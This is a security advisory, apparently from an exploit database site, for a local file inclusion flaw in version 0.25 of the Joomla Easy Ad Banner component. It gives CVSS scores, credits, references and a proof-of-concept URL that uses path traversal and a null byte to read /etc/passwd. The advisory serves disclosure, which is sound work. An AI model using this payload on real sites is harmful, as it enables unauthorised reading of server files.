The Joomla Easy Ad Banner component 0.25 local file inclusion vulnerability

2010.04.14
Credit: AntiSecurity
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

================================================================================================================= [o] Joomla Component Easy Ad Banner Local File Inclusion Vulnerability Software : com_advertising version 0.25 Vendor : http://dev.pucit.edu.pk/ Download : http://dev.pucit.edu.pk/files/com_advertising.zip Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ] Contact : public[at]antisecurity[dot]org Home : http://antisecurity.org/ ================================================================================================================= [o] Exploit http://localhost/[path]/index.php?option=com_advertising&controller=[LFI] [o] PoC http://localhost/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 ================================================================================================================= [o] Greetz Angela Zhang stardustmemory aJe martfella pizzyroot Genex H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 ================================================================================================================= [o] April 12 2010 - GMT +07:00 Jakarta, Indonesia

References:

http://www.exploit-db.com/exploits/12171
http://secunia.com/advisories/39410
http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top